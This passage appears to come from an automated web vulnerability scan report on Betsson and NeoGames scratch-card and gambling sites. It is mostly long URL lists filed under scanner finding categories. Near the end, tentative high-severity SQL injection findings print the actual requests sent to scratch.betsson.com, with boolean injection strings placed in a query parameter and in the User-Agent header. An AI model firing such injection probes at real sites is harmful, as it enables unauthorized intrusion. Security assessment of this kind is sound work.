19.55. https://scratch.betsson.com/en/Classic/7th-Heaven
19.56. https://scratch.betsson.com/en/Classic/Champagne
19.57. https://scratch.betsson.com/en/Classic/Golden-Fortune
19.58. https://scratch.betsson.com/en/Classic/Happy-Birthday
19.59. https://scratch.betsson.com/en/Classic/Jungle-Joy
19.60. https://scratch.betsson.com/en/Classic/Neighbors
19.61. https://scratch.betsson.com/en/Classic/Spy-Comics
19.62. https://scratch.betsson.com/en/Classic/Super-3-Wow
19.63. https://scratch.betsson.com/en/Classic/Tiger-Mahjong
19.64. https://scratch.betsson.com/en/Classic/Wild-West
19.65. https://scratch.betsson.com/en/Classic/XO
19.66. https://scratch.betsson.com/en/Default.aspx
19.67. https://scratch.betsson.com/en/FAQ
19.68. https://scratch.betsson.com/en/Fantasy
19.69. https://scratch.betsson.com/en/Fantasy/Cash-Farm
19.70. https://scratch.betsson.com/en/Fantasy/Club-Pearl
19.71. https://scratch.betsson.com/en/Fantasy/Crazy-Cat
19.72. https://scratch.betsson.com/en/Fantasy/Dancing-Domino
19.73. https://scratch.betsson.com/en/Fantasy/Fast-Hands
19.74. https://scratch.betsson.com/en/Fantasy/Golden-Island
19.75. https://scratch.betsson.com/en/Fantasy/Knights-Battle
19.76. https://scratch.betsson.com/en/Fantasy/Love-Birds
19.77. https://scratch.betsson.com/en/Fantasy/Lucky-Diamonds
19.78. https://scratch.betsson.com/en/Fantasy/Master-Mix
19.79. https://scratch.betsson.com/en/Fantasy/Memory-Madness
19.80. https://scratch.betsson.com/en/Fantasy/Ocean-Pearl
19.81. https://scratch.betsson.com/en/Fantasy/Outer-Space
19.82. https://scratch.betsson.com/en/Fantasy/Super-Chance
19.83. https://scratch.betsson.com/en/Fantasy/The-Fairy-Tale
19.84. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya
19.85. https://scratch.betsson.com/en/Fantasy/Treasure-Island
19.86. https://scratch.betsson.com/en/Fantasy/Zodiac
19.87. https://scratch.betsson.com/en/GameHistory
19.88. https://scratch.betsson.com/en/Information
19.89. https://scratch.betsson.com/en/News
19.90. https://scratch.betsson.com/en/OurScratchcards
19.91. https://scratch.betsson.com/en/Ourwinners
19.92. https://scratch.betsson.com/en/Slots/5th-Avenue
19.93. https://scratch.betsson.com/en/Slots/Adventure-Jack
19.94. https://scratch.betsson.com/en/Slots/Atlantis
19.95. https://scratch.betsson.com/en/Slots/Bon-Apetit
19.96. https://scratch.betsson.com/en/Slots/Cafe-Paris
19.97. https://scratch.betsson.com/en/Slots/Castle-Slots
19.98. https://scratch.betsson.com/en/Slots/Chic-Boutique
19.99. https://scratch.betsson.com/en/Slots/Conga-Beat
19.100. https://scratch.betsson.com/en/Slots/Egyptian-Magic
19.101. https://scratch.betsson.com/en/Slots/Esmeralda
19.102. https://scratch.betsson.com/en/Slots/Fair-Play
19.103. https://scratch.betsson.com/en/Slots/Fantasia
19.104. https://scratch.betsson.com/en/Slots/Grand-Crown
19.105. https://scratch.betsson.com/en/Slots/Holiday-Hotel
19.106. https://scratch.betsson.com/en/Slots/Ice-Land
19.107. https://scratch.betsson.com/en/Slots/Legend-Of-Terra
19.108. https://scratch.betsson.com/en/Slots/Monaco-Glamour
19.109. https://scratch.betsson.com/en/Slots/Monte-Carlo
19.110. https://scratch.betsson.com/en/Slots/Pirates-Paradise
19.111. https://scratch.betsson.com/en/Slots/Sakura-Garden
19.112. https://scratch.betsson.com/en/Slots/Sea-And-Sun
19.113. https://scratch.betsson.com/en/Slots/Sky-Of-Love
19.114. https://scratch.betsson.com/en/Slots/Triple-Carnival
19.115. https://scratch.betsson.com/en/Slots/Tropical-Fruit
19.116. https://scratch.betsson.com/en/Sports/100m-Champion
19.117. https://scratch.betsson.com/en/Sports/Bowling
19.118. https://scratch.betsson.com/en/Sports/Darts
19.119. https://scratch.betsson.com/en/Sports/Goal-Kick
19.120. https://scratch.betsson.com/en/Sports/Gone-Fishing
19.121. https://scratch.betsson.com/en/Sports/Hippodrome
19.122. https://scratch.betsson.com/en/Sports/Ready-Set-Go
19.123. https://scratch.betsson.com/en/Sports/Road-Racing
19.124. https://scratch.betsson.com/en/Sports/World-Champions
19.125. http://sv.bigmoneyscratch.com/Home.aspx
19.126. http://sv.winnings.com/
19.127. http://twitter.com/PostcodeLottery
19.128. http://twitter.com/PrimeScratch
19.129. http://twitter.com/crazyscratch
19.130. http://twitter.com/ukscratch
19.131. http://www.affiliatelounge.com/
19.132. https://www.aspireaffiliates.com/
19.133. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx
19.134. https://www.aspireaffiliates.com/marketing-samples/
19.135. https://www.aspireaffiliates.com/mobile/
19.136. https://www.betsson.com/start/en/
19.137. https://www.betsson.com/start/is/
19.138. https://www.betsson.com/web/en/sportsbook/
19.139. http://www.bigmoneyscratch.com/
19.140. http://www.facebook.com/
19.141. http://www.facebook.com/PrimeScratchCards
19.142. http://www.facebook.com/PrimeScratchCards
19.143. http://www.facebook.com/WinningsCom
19.144. http://www.facebook.com/crazyscratch
19.145. http://www.facebook.com/peoplespostcodelottery
19.146. http://www.facebook.com/plugins/likebox.php
19.148. http://www.heavenaffiliates.com/
19.149. http://www.huddletogether.com/projects/lightbox2/
19.150. http://www.incomate.com/
19.151. http://www.metacafe.com/fplayer/
19.152. https://www.neogamespartners.com/
19.153. https://www.norskelodd.com/no/
19.154. https://www.norskelodd.com/no/FAQ
19.155. https://www.norskelodd.com/no/aboutus/
19.156. https://www.norskelodd.com/no/charity/
19.157. https://www.norskelodd.com/no/default.aspx
19.158. https://www.norskelodd.com/no/fair-play/
19.159. https://www.norskelodd.com/no/forgotten-password
19.160. https://www.norskelodd.com/no/play/3Wow
19.161. https://www.norskelodd.com/no/play/7thHeaven
19.162. https://www.norskelodd.com/no/play/GonzosQuest
19.163. https://www.norskelodd.com/no/promotions/
19.164. http://www.ok.co.uk/home/
19.165. http://www.okscratchcards.com/
19.166. http://www.opensource.org/licenses/mit-license.php
19.167. http://www.primegrattage.com/
19.168. http://www.vincite.net/
19.169. http://www.winnings.com/
19.170. http://www.winnings.com/how-to-win-money
19.171. http://www.winnings.com/instant-games
19.172. http://www.winnings.com/lottery-scratch-cards
19.173. http://www.winnings.com/scratch-cards
19.174. http://www.winnings.com/site-map
19.175. http://www.winnings.com/slots
19.176. http://www.youtube.com/user/CrazyScratchCom
19.177. http://www.youtube.com/user/PostcodeLottery
19.178. http://www.youtube.com/user/primescratchcards1
20.1. http://d.tradex.openx.com/
20.7. http://optimized-by.rubiconproject.com/
20.8. https://sealinfo.verisign.com/
20.9. http://secure-us.imrworldwide.com/
20.11. http://winter.metacafe.com/
20.13. http://www.gambleaware.co.uk/
20.14. http://www.gamcare.org.uk/
20.16. http://www.nedstat.com/
20.17. http://www.opensource.org/
20.18. http://www.postcodelottery.com/
20.19. https://www.postcodelottery.com/
20.20. http://www.quirksmode.org/
20.21. http://www.tstglobal.com/
21.1. https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
21.2. https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js
21.3. https://members.bet365.com/members/chat/
21.4. http://neogames-tech.com/careers
21.5. http://neogames-tech.com/contact-us
21.6. http://neogames-tech.com/corporate
21.7. http://primescratchcards.com/images/HelpDepositMethods.asp
21.8. http://primescratchcards.com/images/InviteFriend.asp
21.9. http://primescratchcards.com/images/Responsible.asp
21.10. http://primescratchcards.com/images/SecurityAndPrivacy.asp
21.11. http://primescratchcards.com/images/aboutus.asp
21.12. http://primescratchcards.com/images/affiliates.asp
21.13. http://primescratchcards.com/images/bg.jpg
21.14. http://primescratchcards.com/images/contactus.asp
21.15. http://primescratchcards.com/images/fairplay.asp
21.16. http://primescratchcards.com/images/help.asp
21.17. http://primescratchcards.com/images/index.asp
21.18. http://primescratchcards.com/images/media.asp
21.19. http://primescratchcards.com/images/playersclub.asp
21.20. http://primescratchcards.com/images/promotions.asp
21.21. http://primescratchcards.com/images/terms.asp
21.22. http://primescratchcards.com/images/underage.asp
21.23. http://scratch.co.uk/about/
21.24. http://scratch.co.uk/contact/
21.25. http://scratch.co.uk/help/
21.26. http://scratch.co.uk/help/privacy/
21.27. http://scratch.co.uk/problem-gambling/
21.28. http://scratch.co.uk/vis-club/
21.29. http://trk.primescratchcards.com/w3c/p3p.xml
21.30. http://widgets.twimg.com/j/2/widget.css
21.31. http://widgets.twimg.com/j/2/widget.js
21.32. http://www.bet365.com/home/js/FlashDetection_vA009cr.js
21.33. http://www.bet365.com/home/js/Navigation_vA081cr.js
21.34. https://www.betsson.com/en/customer-service/
21.35. https://www.betsson.com/en/customer-service/responsible-gaming/
21.36. https://www.betsson.com/en/customer-service/terms/index.asp
21.37. http://www.bigmoneyscratch.com/Affiliates.aspx
21.38. http://www.gamblersanonymous.org/
21.40. http://www.huddletogether.com/projects/lightbox2/
21.41. http://www.lga.org.mt/lga/content.aspx
21.42. http://www.lga.org.mt/lga/home.aspx
21.43. http://www.neogames.com/careers
21.44. http://www.neogames.com/contact-us
21.45. http://www.neogames.com/corporate
21.47. https://www.norskelodd.com/no/FAQ
21.48. https://www.norskelodd.com/no/charity/
21.49. http://www.opensource.org/licenses/mit-license.php
21.50. http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm
21.51. http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm
21.52. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm
21.53. http://www.primegrattage.com/
21.54. http://www.primescratchcards.com/
21.55. http://www.primescratchcards.com/HelpDepositMethods.asp
21.56. http://www.primescratchcards.com/InviteFriend.asp
21.57. http://www.primescratchcards.com/Responsible.asp
21.58. http://www.primescratchcards.com/SecurityAndPrivacy.asp
21.59. http://www.primescratchcards.com/aboutus.asp
21.60. http://www.primescratchcards.com/affiliates.asp
21.61. http://www.primescratchcards.com/contactus.asp
21.62. http://www.primescratchcards.com/fairplay.asp
21.63. http://www.primescratchcards.com/help.asp
21.64. http://www.primescratchcards.com/index.asp
21.65. http://www.primescratchcards.com/media.asp
21.66. http://www.primescratchcards.com/playersclub.asp
21.67. http://www.primescratchcards.com/promotions.asp
21.68. http://www.primescratchcards.com/terms.asp
21.69. http://www.primescratchcards.com/underage.asp
21.70. http://www.primescratchcards.com.br/
21.71. http://www.svenskalotter.com/Affiliates.aspx
21.72. http://www.svenskalotter.com/Charity.aspx
21.73. http://www.verisign.co.uk/
22. Private IP addresses disclosed
22.1. http://connect.facebook.net/en_US/all.js
22.2. http://platform.ak.fbcdn.net/www/app_full_proxy.php
22.3. http://platform.ak.fbcdn.net/www/app_full_proxy.php
22.4. http://platform.ak.fbcdn.net/www/app_full_proxy.php
22.5. http://platform.ak.fbcdn.net/www/app_full_proxy.php
22.6. http://platform.ak.fbcdn.net/www/app_full_proxy.php
22.7. http://platform.ak.fbcdn.net/www/app_full_proxy.php
22.8. http://static.ak.fbcdn.net/connect/xd_proxy.php
22.9. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/R9NKeEUZ860.css
22.10. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/29zADtiP5cm.css
22.11. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/6Lsyu5J6BKV.css
22.12. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/13eVoEevxOb.css
22.13. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/KI-TuOEwsYB.js
22.14. http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Gny22VYkiF8.css
22.15. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/qCyv4dtIhXX.css
22.16. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/cw0X-OuHro4.css
22.17. http://static.ak.fbcdn.net/rsrc.php/v1/yZ/r/pnnjl6ACZdc.css
22.18. http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/zu6qmwS44NI.css
22.19. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/JpK09bsayNa.js
22.20. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/vGrfOJHPJkR.css
22.21. http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/dDcIjg2q0Sp.css
22.22. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/ApyVrGzMbqQ.js
22.23. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/L-db0ALpEr8.js
22.24. http://static.ak.fbcdn.net/rsrc.php/v1/z5/r/55ZG1uMFCrx.png
22.25. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif
22.26. http://static.ak.fbcdn.net/rsrc.php/v1/zC/r/5b5JL166gaA.png
22.27. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/B4K_BWwP7P5.png
22.28. http://static.ak.fbcdn.net/rsrc.php/v1/zM/r/3CROxDf49ph.png
22.29. http://static.ak.fbcdn.net/rsrc.php/v1/zf/r/E6Qp_Akh2Vb.png
22.30. http://www.facebook.com/
22.31. http://www.facebook.com/
22.32. http://www.facebook.com/PrimeScratchCards
22.33. http://www.facebook.com/PrimeScratchCards
22.34. http://www.facebook.com/WinningsCom
22.35. http://www.facebook.com/WinningsCom
22.36. http://www.facebook.com/crazyscratch
22.37. http://www.facebook.com/extern/login_status.php
22.38. http://www.facebook.com/extern/login_status.php
22.39. http://www.facebook.com/pages/BigMoneyScratch/156518521055171
22.40. http://www.facebook.com/pages/PrimeScratchCards/122783514413813
22.41. http://www.facebook.com/peoplespostcodelottery
22.42. http://www.facebook.com/plugins/likebox.php
22.43. http://www.facebook.com/plugins/likebox.php
22.44. https://www.interwetten.com/cs/Default.aspx
22.45. https://www.interwetten.com/de/Default.aspx
22.46. https://www.interwetten.com/el/Default.aspx
22.47. https://www.interwetten.com/en/Default.aspx
22.48. https://www.interwetten.com/en/casino/default.aspx
22.49. https://www.interwetten.com/en/games/default.aspx
22.50. https://www.interwetten.com/en/online-skillgames
22.51. https://www.interwetten.com/en/scratch/default.aspx
22.52. https://www.interwetten.com/en/skill/default.aspx
22.53. https://www.interwetten.com/es/Default.aspx
22.54. https://www.interwetten.com/fr/Default.aspx
22.55. https://www.interwetten.com/it/Default.aspx
22.56. https://www.interwetten.com/pt/Default.aspx
22.57. https://www.interwetten.com/tr/Default.aspx
22.58. http://www.metacafe.com/fplayer/
23.1. http://ad-emea.doubleclick.net/ad/N5493.Ok/B4240999.6
23.2. http://ad.doubleclick.net/N6707/adj/meta.homepage/adminMsg
23.3. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json
23.4. http://b.scorecardresearch.com/b
23.5. https://bingo.betsson.com/en/
23.6. http://blog.crazyscratch.com/
23.7. http://blog.deconcept.com/swfobject/
23.8. http://blog.postcodelottery.com/
23.9. http://blog.primescratchcards.co.uk/
23.10. http://br.winnings.com/
23.11. http://c.betrad.com/a/n/581/1296.js
23.12. http://creativecommons.org/licenses/by-sa/2.5/br/deed.en_US
23.13. http://d.tradex.openx.com/afr.php
23.14. http://d.xp1.ru4.com/um
23.15. http://da.crazyscratch.com/
23.16. http://da.winnings.com/
23.17. http://de.crazyscratch.com/
23.18. http://de.winnings.com/
23.19. http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
23.20. https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
23.21. http://download.neogames-tech.com/Brands/MundiRasca/Website/General/BottomMenuBG.jpg
23.22. https://download.neogames-tech.com/chat/chatstart.aspx
23.23. http://el.crazyscratch.com/
23.24. http://el.winnings.com/
23.25. http://en.crazyscratch.com/
23.26. http://es.crazyscratch.com/
23.27. http://es.winnings.com/
23.28. http://feeds.bbci.co.uk/news/rss.xml
23.29. http://fi.crazyscratch.com/
23.30. http://fi.winnings.com/
23.31. http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
23.32. http://fr.crazyscratch.com/
23.33. http://fr.winnings.com/
23.34. http://getclicky.com/66384109
23.36. http://go.microsoft.com/fwlink/
23.37. http://it.crazyscratch.com/
23.38. http://itunes.apple.com/us/app/pclottery/id399201446
23.39. http://jquery.org/license
23.40. http://leandrovieira.com/projects/jquery/lightbox/
23.41. http://m.xp1.ru4.com/ad
23.42. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml
23.43. http://nl.crazyscratch.com/
23.44. http://nl.winnings.com/
23.45. http://no.crazyscratch.com/
23.46. http://no.winnings.com/
23.47. http://pagead2.googlesyndication.com/pagead/imgad
23.48. http://pixel.invitemedia.com/data_sync
23.49. http://pixel.quantserve.com/pixel
23.50. http://pt.crazyscratch.com/
23.51. http://pt.winnings.com/
23.52. http://pubads.g.doubleclick.net/pagead/adview
23.53. http://s.mcstatic.com/Images/Studios/videogame/ChannelLogo.jpg
23.54. http://s0.2mdn.net/879366/flashwrite_1_2.js
23.55. http://s1.mcstatic.com/JS12/Home/
23.57. http://s4.mcstatic.com/CSS/Global/
23.58. http://s6.mcstatic.com/thumb/6289097/17948388/4/videos/0/1/l_a_noire_gameplay_series_3.jpg
23.59. http://safebrowsing.clients.google.com/safebrowsing/downloads
23.62. http://static.ak.fbcdn.net/connect/xd_proxy.php
23.63. http://sv.crazyscratch.com/
23.64. http://sv.winnings.com/
23.65. http://twitter.com/ukscratch
23.66. http://va.px.invitemedia.com/goog_imp
23.67. http://video.google.com/googleplayer.swf
23.68. http://winnings.com/wp-content/plugins/google-analyticator/external-tracking.min.js
23.69. http://winter.metacafe.com/Openx/www/delivery/lg.php
23.70. http://www.adobe.com/go/getflashplayer
23.71. http://www.apple.com/qtactivex/qtplugin.cab
23.72. https://www.aspireaffiliates.com/
23.73. https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js
23.74. http://www.clickandbuy.com/WW_en/payment/index.html
23.75. http://www.crazyscratch.com/
23.76. http://www.facebook.com/WinningsCom
23.77. http://www.gambleaware.co.uk/
23.78. http://www.gamblersanonymous.org.uk/
23.79. http://www.gamcare.org.uk/
23.80. http://www.google-analytics.com/__utm.gif
23.81. http://www.heavenaffiliates.com/
23.82. https://www.interwetten.com/
23.83. http://www.itechlabs.com.au/
23.84. http://www.lga.org.mt/lga/content.aspx
23.85. http://www.metacafe.com/fplayer/
23.86. http://www.national-lottery.co.uk/
23.87. http://www.nedstat.com/terms.html
23.88. https://www.neogamespartners.com/
23.89. http://www.opensource.org/licenses/mit-license.php
23.90. http://www.paysafecard.com/
23.91. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm
23.92. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm
23.94. https://www.thawte.com/
23.95. http://www.trustlogo.com/ttb_searcher/trustlogo
23.96. http://www.tstglobal.com/
23.98. http://www.verisign.co.uk/
23.99. http://www.vincite.net/
23.100. http://www.winnings.com/
23.101. http://www.youtube.com/v/
24.1. https://in.getclicky.com/
24.2. https://sealinfo.verisign.com/splash
24.3. https://www.aspireaffiliates.com/
24.4. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx
24.5. https://www.aspireaffiliates.com/marketing-samples/
24.6. https://www.aspireaffiliates.com/mobile/
24.7. https://www.betsson.com/en/customer-service/
24.8. https://www.betsson.com/en/customer-service/forgotten-password/
24.9. https://www.betsson.com/en/customer-service/privacy-statement/
24.10. https://www.betsson.com/en/customer-service/responsible-gaming/
24.11. https://www.betsson.com/en/customer-service/terms/index.asp
24.12. https://www.betsson.com/my-account/refer-a-friend/index.asp
24.13. https://www.interwetten.com/en/Default.aspx
24.14. https://www.interwetten.com/en/american-football-betting
24.15. https://www.interwetten.com/en/australian-rules-football-betting
24.16. https://www.interwetten.com/en/beach-soccer-betting
24.17. https://www.interwetten.com/en/boxing-betting
24.18. https://www.interwetten.com/en/casino/default.aspx
24.19. https://www.interwetten.com/en/cycling-betting
24.20. https://www.interwetten.com/en/darts-betting
24.21. https://www.interwetten.com/en/football-betting
24.22. https://www.interwetten.com/en/games/default.aspx
24.23. https://www.interwetten.com/en/golf-betting
24.24. https://www.interwetten.com/en/handball-betting
24.25. https://www.interwetten.com/en/ice-hockey-betting
24.26. https://www.interwetten.com/en/livebets
24.27. https://www.interwetten.com/en/motorbikes-betting
24.28. https://www.interwetten.com/en/online-skillgames
24.29. https://www.interwetten.com/en/politics-betting
24.30. https://www.interwetten.com/en/rugby-betting
24.31. https://www.interwetten.com/en/sailing-betting
24.32. https://www.interwetten.com/en/scratch/default.aspx
24.33. https://www.interwetten.com/en/ski-alpine-betting
24.34. https://www.interwetten.com/en/skill/default.aspx
24.35. https://www.interwetten.com/en/sportsbook/default.aspx
24.36. https://www.interwetten.com/en/tennis-betting
24.37. https://www.interwetten.com/en/volleyball-betting
24.38. https://www.interwetten.com/en/water-polo-betting
24.39. https://www.interwetten.com/en/winter-games-betting
24.40. https://www.norskelodd.com/no/
24.41. https://www.norskelodd.com/no/FAQ
24.42. https://www.norskelodd.com/no/aboutus/
24.43. https://www.norskelodd.com/no/charity/
24.44. https://www.norskelodd.com/no/default.aspx
24.45. https://www.norskelodd.com/no/fair-play/
24.46. https://www.norskelodd.com/no/forgotten-password
24.47. https://www.norskelodd.com/no/play/3Wow
24.48. https://www.norskelodd.com/no/play/7thHeaven
24.49. https://www.norskelodd.com/no/play/GonzosQuest
24.50. https://www.norskelodd.com/no/promotions/
24.51. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm
24.52. https://www.thawte.com/
25. HTML does not specify charset
25.1. http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427
25.3. http://download.neogames-tech.com/
25.4. http://f.nexac.com/favicon.ico
25.5. http://in.getclicky.com/
25.6. https://in.getclicky.com/
25.7. http://members.bet365.com/site.asp
25.8. http://neogames-tech.com/outbound/article/www.lga.org.mt
25.9. http://pixel.invitemedia.com/data_sync
25.10. http://trk.primescratchcards.com/
25.11. http://www.gamblersanonymous.org/
25.12. http://www.maestrocard.com/
25.13. http://www.mastercard.com/uk/gateway.html
25.14. http://www.neogames.com/outbound/article/crazyscratch.com
25.15. http://www.neogames.com/outbound/article/karamba.com
25.16. http://www.neogames.com/outbound/article/mundirasca.com
25.17. http://www.neogames.com/outbound/article/norgesloddet.com
25.18. http://www.neogames.com/outbound/article/scratch.betsson.com
25.19. http://www.neogames.com/outbound/article/www.crazyscratch.com
25.20. http://www.neogames.com/outbound/article/www.interwetten.com
25.21. http://www.neogames.com/outbound/article/www.postcodelottery.co.uk
25.22. http://www.neogames.com/outbound/article/www.winnings.com
25.23. http://www.primescratchcards.com/track/
25.24. http://www.verisign.co.uk/
25.25. http://www.winnings.com/wp-admin/admin-ajax.php
26. Content type incorrectly stated
26.1. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json
26.2. http://in.getclicky.com/
26.3. https://in.getclicky.com/
26.4. http://neogames-tech.com/outbound/article/www.lga.org.mt
26.5. http://rtb50.doubleverify.com/rtb.ashx/verifyc
26.6. https://secure.neogames-tech.com/ScratchCards/images/seal_background.png
26.7. http://server.iad.liveperson.net/hcp/html/mTag.js
26.8. http://trk.primescratchcards.com/w3c/p3p.xml
26.9. http://www.neogames.com/outbound/article/crazyscratch.com
26.10. http://www.neogames.com/outbound/article/karamba.com
26.11. http://www.neogames.com/outbound/article/mundirasca.com
26.12. http://www.neogames.com/outbound/article/norgesloddet.com
26.13. http://www.neogames.com/outbound/article/scratch.betsson.com
26.14. http://www.neogames.com/outbound/article/www.crazyscratch.com
26.15. http://www.neogames.com/outbound/article/www.interwetten.com
26.16. http://www.neogames.com/outbound/article/www.postcodelottery.co.uk
26.17. http://www.neogames.com/outbound/article/www.winnings.com
26.18. http://www.winnings.com/wp-admin/admin-ajax.php
27. Content type is not specified
Severity: | High |
Confidence: | Tentative |
Host: | https://scratch.betsson |
Path: | /en/Casino/Disco-Keno |
GET /en/Casino/Disco-Keno?1%20and%201%3d1--%20=1 HTTP/1.1 Host: scratch.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/ X-AspNet-Version: 2.0.50727 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/ Set-Cookie: lggdnstt=0; path=/ X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:55:10 GMT Connection: close Content-Length: 102704 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="head"> ...[SNIP]... <a href="https://scratch </div> <div class="divLeftMenuPr </div> <div class="divMiddleContent" id="divMiddleContent" > <div id="active_main_promo"> <div class="divMainPromo" id="divMainPromo"></div> </div> <div id="divMain" class="divMain"> <meta name="WT.ti" content="Scratch <meta name="WT.cg_s" content="Startpage_Casino <!-- Meta data for AB-testing, remove when tests id done --> <div class="gamesView"> <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain ...[SNIP]... |
GET /en/Casino/Disco-Keno?1%20and%201%3d2--%20=1 HTTP/1.1 Host: scratch.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/ X-AspNet-Version: 2.0.50727 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/ Set-Cookie: lggdnstt=0; path=/ X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:55:10 GMT Connection: close Content-Length: 102694 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="head"> ...[SNIP]... <a href="https://scratch </div> <div class="divLeftMenuPr </div> <div class="divMiddleContent" id="divMiddleContent" > <div id="active_main_promo"> <div class="divMainPromo" id="divMainPromo"></div> </div> <div id="divMain" class="divMain"> <meta name="WT.ti" content="Scratch <meta name="WT.cg_s" content="Startpage_Casino <!-- Meta data for AB-testing, remove when tests id done --> <div class="gamesView"> <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | https://scratch.betsson |
Path: | /en/Fantasy/The-Lost-Maya |
GET /en/Fantasy/The-Lost-Maya HTTP/1.1 Host: scratch.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d1--%20 Connection: close Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:44 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:44 GMT; path=/ X-AspNet-Version: 2.0.50727 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:44 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:44 GMT; path=/ Set-Cookie: lggdnstt=0; path=/ X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:54:44 GMT Connection: close Content-Length: 102708 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="head"> ...[SNIP]... <a href="https://scratch </div> <div class="divLeftMenuPr </div> <div class="divMiddleContent" id="divMiddleContent" > <div id="active_main_promo"> <div class="divMainPromo" id="divMainPromo"></div> </div> <div id="divMain" class="divMain"> <meta name="WT.ti" content="Scratch <meta name="WT.cg_s" content="Startpage <!-- Meta data for AB-testing, remove when tests id done --> <div class="gamesView"> <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain ...[SNIP]... |
GET /en/Fantasy/The-Lost-Maya HTTP/1.1 Host: scratch.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d2--%20 Connection: close Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId |
